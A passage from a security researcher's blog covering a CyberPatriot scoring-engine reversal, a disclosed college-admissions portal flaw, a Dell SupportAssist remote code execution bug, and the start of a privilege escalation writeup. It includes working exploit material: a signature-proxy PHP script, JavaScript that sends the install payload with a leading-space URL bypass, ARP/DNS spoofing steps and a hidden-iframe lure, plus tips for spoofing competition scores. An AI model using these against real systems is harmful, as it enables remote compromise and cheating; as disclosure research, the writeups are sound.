The function "ExecuteCheck" essentially loops every pass condition for a check and executes the check instructions (i.e C:\trojan.exe Exists Equals true). I won't get into the nuances of this function, but this is an important note if you want to spoof that the check passed. The check + 0x54 is a byte which indicates whether or not it passed. Set it to 1 and the engine will consider that check to be successful.

After executing every check, the engine calls a function I call "GenerateScoringXML". This function takes in the data from the checks and generates an XML file that will be sent to the scoring server. It loops each check/penalty and checks the check + 0x54 byte to see if it passed. This XML is also stored in encrypted data files under "C:\CyberPatriot\ScoringData\*.dat". Here is what a scoring XML looks like (you can use my decrypt program on these data files too!):

<?xml version="1.0" encoding="utf-8"?>
<CyberPatriot>
  <ResourceID></ResourceID>
  <TeamID/>
  <Tier/>
  <StartTime></StartTime>
  <VerifiedStartTime></VerifiedStartTime>
  <BestStartTime></BestStartTime>
  <TeamStartTime/>
  <ClientTime></ClientTime>
  <ImageRunningTime></ImageRunningTime>
  <TeamRunningTime></TeamRunningTime>
  <Nonce></Nonce>
  <Seed></Seed>
  <Mac></Mac>
  <Cpu></Cpu>
  <Uptime></Uptime>
  <Sequence>1</Sequence>
  <Tampered>false</Tampered>
  <ResourcePath>C:\CyberPatriot\ScoringResource.dat</ResourcePath>
  <ResourceHash></ResourceHash>
  <ClientPath>C:\CyberPatriot\CCSClient.exe</ClientPath>
  <ClientHash></ClientHash>
  <InstallDate></InstallDate>
  <ProductID></ProductID>
  <DiskID></DiskID>
  <MachineID></MachineID>
  <DPID></DPID>
  <Check>
    <CheckID></CheckID>
    <Passed>0</Passed>
  </Check>
  <Penalty>
    <CheckID></CheckID>
    <Passed>0</Passed>
  </Penalty>
  <TotalPoints>0</TotalPoints>
</CyberPatriot>

After generating the Scoring XML, the program calls a function I call "UploadScores". Initially, this function checks internet connectivity by trying to reach Google, the first CyberPatriot scoring server, and the backup CyberPatriot scoring server. The function uploads the scoring XML to the first available scoring server using curl. This function does integrity checks to see if the score XML is incomplete or if there is proxy interception.

After the scoring XML has been uploaded, the engine updates the "ScoringReport.html" to reflect the current status such as internet connectivity, the points scored, the vulnerabilities found, etc.

Finally, the function ends with updating the README shortcut on the Desktop with the appropriate link specified in the decrypted "ScoringResource.dat" XML and calling "DestructImage" again to see if the image should destruct or not. If you're worried about the image destructing, just hook it and return 0.

Conclusion

In conclusion, the CyberPatriot Scoring Engine is really not that complicated. I hope that this article clears up some of the myths and unknowns associated with the engine and gives you a better picture of how it all works. No doubt CyberPatriot will change how they encrypt/decrypt for next years CyberPatriot, but I am not sure to what extent they will change things.

If you're wondering how I got the "ScoringResource.dat" files from older VM images, there are several methods:

  • VMWare has an option under File called "Map Virtual Disks". You can give it a VMDK file and it will extract it for you into a disc. You can grab it from the filesystem there.
  • 7-Zip can extract VMDK files.
  • If you want to run the VM, you can set your system time to be the time the competition was and turn off networking for the VM. No DestructImage :)

Hacking College Admissions

13 April 2019 at 14:13
Hacking College Admissions

Getting into college is one of the more stressful time of a high school student's life. Since the admissions process can be quite subjective, students have to consider a variety of factors to convince the admissions officers that "they're the one". Some families do as much as they can to improve their chances - even going as far as trying to cheat the system. For wealthier families, this might be donating a very large amount to the school or as we've heard in the news recently, bribing school officials.

If you don't know about me already, I'm a 17-year-old high school senior that has an extreme interest in the information security field and was part of the college admissions process this year. Being part of the college admissions process made me interested in investigating, "Can you hack yourself into a school?". In this article, I'll be looking into TargetX, a "Student Lifecycle Solution for Higher Education" that serves several schools. All of this research was because of my genuine interest in security, not because I wanted to get into a school through malicious means.

Investigation

The school I applied to that was using TargetX was the Worcester Polytechnic Institute in Worcester, Massachusetts. After submitting my application on the Common App, an online portal used to apply to hundreds of schools, I received an email to register on their admissions portal. The URL was the first thing that shot out at me, https://wpicommunity.**force.com**/apply. Force.com reminded me of Salesforce and at first I didn't think Salesforce did college admissions portals. Visiting force.com brought me to their product page for their "Lightning Platform" software. It looked like it was a website building system for businesses. I thought the college might have made their own system, but when I looked at the source of the registration page it referred to something else called TargetX. This is how I found out that TargetX was simply using Salesforce's "Lightning Platform" to create a college admissions portal.

After registering, I started to analyze what was being accessed. At the same time, I was considering that this was a Salesforce Lightning Platform. First, I found their REST api platform hinged on a route called "apexremote", this turned out to be Salesforce's way of exposing classes to clients through REST. Here is the documentation for that. Fortunately, WPI had configured it correctly so that you could only access API's that you were supposed to access and it was pretty shut down. I thought about other API's Salesforce might expose and found out they had a separate REST/SOAP API too. In WPI's case, they did a good job restricting this API from student users, but in general this is a great attack vector (I found this API exposed on a different Salesforce site).

After digging through several javascript files and learning more about the platform, I found out that Salesforce had a user interface backend system. I decided to try to access it and so I tried a random URL: /apply/_ui/search/ui/aaaaa. This resulted in a page that looked like this:

Hacking College Admissions

It looked like a standard 404 page. What caught my eye was the search bar on the top right. I started playing around with the values and found out it supported basic wildcards. I typed my name and used an asterick to see if I could find anything.

Hacking College Admissions

Sorry for censoring, but the details included some sensitive details. It seemed as though I could access my own "Application Form" and contact. I was not able to access the application of any other students which gave a sigh of relief, but it soon turned out that just being able to access my own application was severe enough.

After clicking on my name in the People section, I saw that there was an application record assigned to me. I clicked on it and then it redirected me to a page with a significant amount of information.

Hacking College Admissions

Here's a generalized list of everything I was able to access:

General application information
Decision information (detailed list of different considered factors)
Decision dates
Financial Aid information
GPA
Enrollment information
Decision information (misc. options i.e to show decision or not)
Recommendations (able to view them)
SAT / ACT Scores
High school transcript
Perosnal statement
Application fee

Here's where it gets even worse, I can edit everything I just listed above. For example:

Hacking College Admissions

Don't worry, I didn't accept myself into any schools or make my SAT Scores a 1600.

Initial contact

After finding this vulnerability, I immediately reached out to WPI's security team the same day to let them know about the vulnerabilities I found. They were very receptive and within a day they applied their first "patch". Whenever I tried accessing the backend panel, I would see my screen flash for a quick second and then a 404 Message popped up.

Hacking College Admissions

The flash had me interested, upon reading the source code of the page, I found all the data still there! I was very confused and diff'd the source code with an older copy I had saved. This is the javascript blocked that got added:

if (typeof sfdcPage != 'undefined') {
    if (window.stop) {
        window.stop();
    } else {
        document.execCommand("Stop");
    }
    /*lil too much*/
    if (typeof SimpleDialog != 'undefined') {
        var sd = new SimpleDialog("Error" + Dialogs.getNextId(), false);
        sd.setTitle("Error");
        sd.createDialog();
        window.parent.sd = sd;
        sd.setContentInnerHTML("<p align='center'><img src='/img/msg_icons/error32.png' style='margin:0 5px;'/></p><p align='center'>404 Page not found.</p><p align='center'><br /></p>");
        sd.show();
    }
    document.title = "Error 404";
}

This gave me a good chuckle. What they were doing was stopping the page from loading and then replacing the HTML with a 404 error. I could just use NoScript, but I decided to create a simple userscript to disable their tiny "fix".

(function() {
    'use strict';

    if(document.body.innerHTML.includes("404 Page not found.")) {
        window.stop();
        const xhr = new XMLHttpRequest();
        xhr.open('GET', window.location.href);
        xhr.onload = () => {
            var modified_html = xhr.responseText
            .replace(/<script\b[\s\S]*?<\/script>/g, s => {
                if (s.includes("lil too much"))
                    return ""; // Return nothing for the script content
                return s;
            });
            document.open();
            document.write(modified_html);
            document.close();
        };
        xhr.send();
    }
})();

Basically, this userscript will re-request the page and remove any "404" script blocks then set the current page to the updated html. It worked great and bypassed their fix. As suspected, WPI only put a "band aid over the issue" to stop any immediate attacks. What I later learned when looking at some other schools was that TargetX themselves added the script under the name "TXPageStopper" - this wasn't just WPI's fix.

It's important to note that if you tried this today, sure the 404 page would be removed, but nothing is accessible. They've had this patch since January and after doing a real patch to fix the actual issue, they just never removed the 404 page stopper.

Remediation?

This is going to be a small section about my interactions with WPI after sending them the vulnerability details. I first found and reported this vulnerability back in January, specifically the third. WPI was very responsive (often replied within hours). I contacted them on February 14th again asking how the vulnerability patch was going and whether or not this was a vulnerability in only WPI or it was a vulnerability in TargetX too. Again within an hour, WPI responded saying that they have fixed the issues and that they had a "final meeting set up for the incident review". They said, "It was a combination of a TargetX vulnerability as well as tightening up some of our security settings".

I immediately (within 8 minutes) replied to their email asking for the TargetX side of the vulnerability to apply for a CVE. This is when things turned sour. Five days past and there was no reply. I sent a follow-up email to check in. I sent another follow up the next week and the week after that. Complete radio silence. By March 16th, I decided to send a final email letting them know that I had intended to publish about the vulnerability that week, but this time I CC'd the boss of the person I was in contact with.

Within a day, on a Sunday, the boss replied saying that they had not been aware that I was waiting on information. This is specifically what that email said:

We will reach out to TargetX tomorrow and determine and confirm the exact details of what we are able to release to you. I will be in touch in a day or two with additional information once we have talked with TargetX. We would prefer that you not release any blog posts until we can follow-up with TargetX. Thank you.

Of course if the vulnerability had not been completely patched yet, I did not want to bring any attention to it. I sent back an email appreciating their response and that I looked forward to their response.

A week past. I sent a follow up email asking on the status of things. No response. I sent another follow up the next week and this time I mentioned that I again was planning to publish. Radio silence.

It has been about a week since I sent that email and because I have had no response from them, I decided to publish given that they had said they had patched the vulnerability and because I could not extract any more data.

Other schools impacted

I named this post "Hacking College Admissions" because this vulnerability was not just in WPI. Besides WPI confirming this to me themselves, I found similar vulnerabilities in other schools that were using the TargetX platform.

To find other schools impacted, I found all of the subdomains of force.com and tried to find universities. I am sure I missed some schools, but this is a small list of the other schools affected.

Antioch University
Arcadia University
Averett University
Bellevue University
Berklee College of Music
Boston Architechtural College
Boston University
Brandman University
Cabrini University
California Baptist University
California School Of The Arts, San Gabriel Valley
Cardinal University
City Year
Clarion University of Pennsylvania
Columbia College
Concordia University, Irvine
Concordia University, Montreal
Concordia University, Oregon
Concordia University, Texas
Delaware County Community College
Dominican University
ESADE Barcelona
East Oregon University
Eastern University
Embry-Riddle Aeronautical University
Fashion Institute of Design & Merchandising
George Mason University
George Washington University
Grove City College
Harvard Kennedy School
Hood College
Hope College
Illinois Institute of Technology
International Technological University
Johnson & Wales University
Keene State College
Laguna College
Lebanon Valley College
Lehigh Carbon Community College
London School of Economics and Political Science
Mary Baldwin University
Master's University
Morovian College
Nazareth College
New York Institute of Technology
Oregon State University
Pepperdine University
Piedmont College
Plymouth State University
Regis College
Saint Mary's University of Minnesota
Simpson University
Skagit Valley College
Summer Discovery
Texas State Technical College
Townson University
USC Palmetto College
University of Akron
University of Arizona, Eller MBA
University of California, Davis
University of California, San Diego
University of California, Santa Barbara
University of Dayton
University of Houston
University of Maine
University of Michigan-Dearborn
University of Nevada, Reno
University of New Hampshire
University of New Haven
University of Texas, Dallas
University of Virginia
University of Washington
Universwity of Alabama, Birmingham
West Virginia University
Western Connecticut University
Western Kentucky University
Western Michigan University
Wisconsin Indianhead Technical College
Worcester Polytechnic Institute
Wright State University

There are some schools that appeared to be running on the same Salesforce platform, but on a custom domain which is probably why I missed schools.

Conclusion

It turns out, having lots of money isn't the only way to get into your dream college and yes, you can "Hack yourself into a school". The scary part about my findings was that at least WPI was vulnerable since they implemented the Salesforce system in 2012. Maybe students should be taking a better look at the systems around them, because all I can imagine is if someone found something like this and used it to cheat the system.

I hope you enjoyed the article and feel free to message me if you have any questions.

Remote Code Execution on most Dell computers

30 April 2019 at 12:52
Remote Code Execution on most Dell computers

What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is "What third-party software came with my PC?". In this article, I'll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to "proactively check the health of your system’s hardware and software" and which is "preinstalled on most of all new Dell devices".

Discovery

Back in September, I was in the market for a new laptop because my 7-year-old Macbook Pro just wasn't cutting it anymore. I was looking for an affordable laptop that had the performance I needed and I decided on Dell's G3 15 laptop. I decided to upgrade my laptop's 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell's support site, I was prompted with an interesting option.

Remote Code Execution on most Dell computers

"Detect PC"? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.

Remote Code Execution on most Dell computers

A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn't installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.

Installing it was a painless process with just a click to install button. In the shadows, the SupportAssist Installer created the SupportAssistAgent and the Dell Hardware Support service. These services corresponded to .NET binaries making it easy to reverse engineer what it did. After installing, I went back to the Dell website and decided to check what it could find.

Remote Code Execution on most Dell computers

I opened the Chrome Web Inspector and the Network tab then pressed the "Detect Drivers" button.

Remote Code Execution on most Dell computers

The website made requests to port 8884 on my local computer. Checking that port out on Process Hacker showed that the SupportAssistAgent service had a web server on that port. What Dell was doing is exposing a REST API of sorts in their service which would allow communication from the Dell website to do various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests.

On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken which also provides when the signature expires. After pressing download drivers on the web side, this request was of particular interest:

POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Origin: https://www.dell.com
Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

The body:

[
    {
    "title":"Dell G3 3579 and 3779 System BIOS",
    "category":"BIOS",
    "name":"G3_3579_1.9.0.exe",
    "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
    "isSecure":false,
    "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66",
    "run":false,
    "restricted":false,
    "fileId":"198393521",
    "fileSize":"13 MB",
    "checkedStatus":false,
    "fileStatus":-99,
    "driverId":"4WW45",
    "path":"",
    "dupInstallReturnCode":"",
    "cssClass":"inactive-step",
    "isReboot":true,
    "DiableInstallNow":true,
    "$$hashKey":"object:175"
    }
]

It seemed like the web client could make direct requests to the SupportAssistAgent service to "download and manually install" a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued.

On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.

ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.

An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:

// Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
public static bool ValidateDomain(Uri request, Uri urlReferrer)
{
	return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost")) &&request.Scheme.ToLower().StartsWith("http") && urlReferrer.Scheme.ToLower().StartsWith("http");
}

// Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
public static bool ValidateDomain(string domain)
{
	return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar") || domain.EndsWith(".supportassist.com");
}

The issue with the function above is the fact that it really isn’t a solid check and gives an
attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

  1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to
    find one on the sites designated for SupportAssist)
  2. Find a Subdomain Takeover vulnerability
  3. Make the request from a local program
  4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.

In the end, I decided to go with option 4, and I’ll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS.

When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell’s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browsers console.

At first, the website tries to detect SupportAssist by looping through the aformentioned service ports and connecting to the Service Method “isalive”. What was interesting was that it was passing a “Signature” parameter and a “Expires” parameter. To find out more, I reversed the javascript side of the browser. Here’s what I found out:

  1. First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem.
  2. Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE].
  3. The SupportAssist client then responds when the right service port is reached, with a style like this:
{
	"isAlive": true,
	"clientVersion": "[CLIENT VERSION]",
	"requiredVersion": null,
	"success": true,
	"data": null,
	"localTime": [EPOCH TIME],
	"Exception": {
		"Code": null,
		"Message": null,
		"Type": null
	}
}
  1. Once the browser sees this, it continues with further requests using the now determined
    service port.

Some concerning factors I noticed while looking at different types of requests I could make is that I could get a very detailed description of every piece of hardware connected to my computer using the “getsysteminfo” route. Even through Cross Site Scripting, I was able to access this data, which is an issue because I could seriously fingerprint a system and find some sensitive information.

Here are the methods the agent exposes:

clientservice_getdevicedrivers - Grabs available updates.
diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
downloadservice_downloadfiles - Downloads a JSON array of files.
clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
clientservice_getservicetag - Grabs the service tag.
localclient_img - Connects to SignalR (Dell Hardware Support).
diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
diagnosticsservice_launchtool - Launches a diagnostic tool.
diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
downloadservice_createiso - Download an ISO.
clientservice_checkadminrights - Check if the Agent privileged.
diagnosticsservice_performinstallation - Update SupportAssist.
diagnosticsservice_rebootsystem - Reboot system.
clientservice_getdevices - Grab system devices.
downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
downloadservice_createbootableiso - Download bootable iso.
diagnosticsservice_isalive - Heartbeat check.
downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
clientservice_getscanresults - Gets driver scan results.
downloadservice_restartsystem - Restarts the system.

The one that caught my interest was downloadservice_downloadandautoinstall. This method would download a file from a specified URL and then run it. This method is ran by the browser when the user needs to install certain drivers that need to be installed automatically.

  1. After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”.
  2. The browser sends a request with the following JSON structure:
[
	{
	"title":"DOWNLOAD TITLE",
	"category":"CATEGORY",
	"name":"FILENAME",
	"location":"FILE URL",
	"isSecure":false,
	"fileUniqueId":"RANDOMUUID",
	"run":true,
	"installOrder":2,
	"restricted":false,
	"fileStatus":-99,
	"driverId":"DRIVER ID",
	"dupInstallReturnCode":0,
	"cssClass":"inactive-step",
	"isReboot":false,
	"scanPNPId":"PNP ID",
	"$$hashKey":"object:210"
	}
] 
  1. After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.
  2. ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.
  3. ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method:
if (service_Method == "downloadservice_downloadandautoinstall")
{
	string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
	result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
} 

Which calls DownloadServiceLogic.DownloadAutoInstall and provides the files we sent in the JSON payload.
6. DownloadServiceLogic.DownloadAutoInstall acts as a wrapper (i.e handling exceptions) for DownloadServiceLogic._HandleJson.
7. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:

foreach (File file in list)
{
	bool flag2 = file.Location.ToLower().StartsWith("http://");
	if (flag2)
	{
		file.Location = file.Location.Replace("http://", "https://");
	}
	bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
	if (flag3)
	{
		DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
		throw new InvalidFileException();
	}
}
DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);

The above code loops through every file, and checks if the file URL we provided doesn’t start with http:// (if it does, replace it with https://), and checks if the URL matches a list of Dell’s download servers (not all subdomains):

public static bool CheckDomain(string fileLocation)
{
	List<string> list = new List<string>
	{
		"ftp.dell.com",
		"downloads.dell.com",
		"ausgesd4f1.aus.amer.dell.com"
	};
	
	return list.Contains(new Uri(fileLocation.ToLower()).Host);
} 
  1. Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest at which point the SupportAssist downloads and runs the files as Administrator.

This is enough information we need to start writing an exploit.

Exploitation

The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain, we’ll get into how exactly we do this further in this section. I decided to mimic the browser and make requests using javascript.

First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to “/clientservice/isalive”. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to “https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken”.

This isn’t as straight-forwards as it might seem. The “Access-Control-Allow-Origin” of the signature url is set to “https://www.dell.com”. This is a problem, because we’re in the context of a subdomain, probably not https. How do we get past this barrier? We make the request from our own servers!

The signatures that are returned from “getdsdtoken” are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures:

<?php
header('Access-Control-Allow-Origin: *');
echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken');
?> 

The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the “getdsdtoken” route. The “getdsdtoken” route returns JSON with signatures and an expire time. We can just use JSON.parse on the results to place the signatures into a javascript object.

Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, we set the server_port variable (global) to the port that responded:

function FindServer() {
	ports.forEach(function(port) {
		var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
		var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
	});
} 

After we have found the server, we can send our payload. This was the hardest part, we have some serious obstacles before “downloadandautoinstall” executes our payload.

Starting with the hardest issue, the SupportAssist client has a hard whitelist on file locations. Specifically, its host must be either "ftp.dell.com", "downloads.dell.com", or "ausgesd4f1.aus.amer.dell.com". I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me, we can do a man-in-the-middle attack.

If we could provide the SupportAssist client with a http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.

The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back to the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can’t really intercept and change the contents of a proper https connection. The key bypass to this mitigation was in this sentence: “if the URL starts with http://, it will be replaced by https://”. See, the thing was, if the URL string did not start with http://, even if there was http:// somewhere else in the string, it wouldn’t replace it. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you ran the string through the starts with check, it would return false, because the string starts with “ “, thus leaving the “http://” alone.

I made a function that automated sending the payload:

function SendRCEPayload() {
	var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("POST", auto_install_url, true);

	var files = [];
	
	files.push({
	"title": "SupportAssist RCE",
	"category": "Serial ATA",
	"name": "calc.EXE",
	"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
	"isSecure": false,
	"fileUniqueId": guid(),
	"run": true,
	"installOrder": 2,
	"restricted": false,
	"fileStatus": -99,
	"driverId": "FXGNY",
	"dupInstallReturnCode": 0,
	"cssClass": "inactive-step",
	"isReboot": false,
	"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
	"$$hashKey": "object:210"});
	
	xmlhttp.send(JSON.stringify(files)); 
}

Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker's machine):

  1. Grab the interface IP address for the specified interface.
  2. Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier.
  3. To ARP Spoof the victim, we first enable ip forwarding then send an ARP packet to the victim telling it that we're the router and an ARP packet to the router telling it that we're the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we will send the original mac addresses to the victim and router.
  4. Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.
  5. When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload.

You can read Dell's advisory here.

Demo

Here's a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here.

The source code of the dellrce.html file featured in the video is:

<h1>CVE-2019-3719</h1>
<h1>Nothing suspicious here... move along...</h1>
<iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe>

Timeline

10/26/2018 - Initial write up sent to Dell.

10/29/2018 - Initial response from Dell.

11/22/2018 - Dell has confirmed the vulnerability.

11/29/2018 - Dell scheduled a "tentative" fix to be released in Q1 2019.

01/28/2019 - Disclosure date extended to March.

03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.

04/18/2019 - Vulnerability disclosed as an advisory.

Local Privilege Escalation on Dell machines running Windows

19 July 2019 at 14:30
Local Privilege Escalation on Dell machines running Windows

In May, I published a blog post detailing a Remote Code Execution vulnerability in Dell SupportAssist. Since then, my research has continued and I have been finding more and more vulnerabilities. I strongly suggest that you read my previous blog post, not only because it provides a solid conceptual understanding of Dell SupportAssist, but because it's a very interesting bug.

This blog post will cover my research into a Local Privilege Escalation vulnerability in Dell SupportAssist. Dell SupportAssist is advertised to "proactively check the health of your system’s hardware and software". Unfortunately, Dell SupportAsssist comes pre-installed on most of all new Dell machines running Windows. If you're on Windows, never heard of this software, and have a Dell machine - chances are you have it installed.

Discovery

Amusingly enough, this bug was discovered while I was doing my write-up for the previous remote code execution vulnerability. For switching to previous versions of Dell SupportAssist, my method is to stop the service, terminate the process, replace the binary files with an older version, and finally start the service. Typically, I do this through a neat tool called Process Hacker, which is a vamped up version of the built-in Windows Task Manager. When I started the Dell SupportAssist agent, I saw this strange child process.

Local Privilege Escalation on Dell machines running Windows

I had never noticed this process before and instinctively I opened the process to see if I could find more information about it.

Local Privilege Escalation on Dell machines running Windows

We straight away can tell that it's a .NET Application given the ".NET assemblies" and ".NET performance" tabs are populated. Browsing various sections of the process told us more about it. For example, the "Token" tab told us that this was an unelevated process running as the current user.

Local Privilege Escalation on Dell machines running Windows

While scrolling through the "Handles" tab, something popped out at me.

Local Privilege Escalation on Dell machines running Windows

For those who haven't used Process Hacker in the past, the cyan color indicates that a handle is marked as inheritable. There are plenty of processes that have inheritable handles, but the key part about this handle was the process name it was associated with. This was a THREAD handle to SupportAssistAgent.exe, not SupportAssistAppWire.exe. SupportAssistAgent.exe was the parent SYSTEM process that created SupportAssistAppWire.exe - a process running in an unelevated context. This wasn't that big of a deal either, a SYSTEM process may share a THREAD handle to a child process - even if it's unelevated, but with restrictive permissions such as THREAD_SYNCHRONIZE. What I saw next is where the problem was evident.

Local Privilege Escalation on Dell machines running Windows

This was no restricted THREAD handle that only allowed for basic operations, this was straight up a FULL CONTROL thread handle to SupportAssistAgent.exe. Let me try to put this in perspective. An unelevated process has a FULL CONTROL handle to a thread in a process running as SYSTEM. See the issue?

Let's see what causes this and how we can exploit it.

Reversing

Every day, Dell SupportAssist runs a "Daily Workflow Task" that performs several actions typically to execute routine checks such as seeing if there is a new notification that needs to be displayed to the user. Specifically, the Daily Workflow Task will:

  • Attempt to query the latest status of any cases you have open
  • Clean up the local database of unneeded entries
  • Clean up log files older than 30 days
  • Clean up reports older than 5 days (primarily logs sent to Dell)
  • Clean up analytic data
  • Registers your device with Dell
  • Upload all your log files if it's been 30-45 days
  • Upload any past failed upload attempts
  • If it's been 14 days since the Agent was first started, issue an "Optimize System" notification.

The important thing to remember is that all of these checks were performed on a daily basis. For us, the last check is most relevant, and it's why Dell users will receive this "Optimize System" notification constantly.

Local Privilege Escalation on Dell machines running Windows

If you haven't run the PC Doctor optimization scan for over 14 days, you'll see this notification every day, how nice. After determining a notification should be created, the method OptimizeSystemTakeOverNotification will call the PushNotification method to issue an "Optimize System" notification.

For most versions of Windows 10, PushNotification will call a method called LaunchUwpApp. LaunchUwpApp takes the following steps:

  1. Grab the active console session ID. This value represents the session ID for the user that is currently logged in.
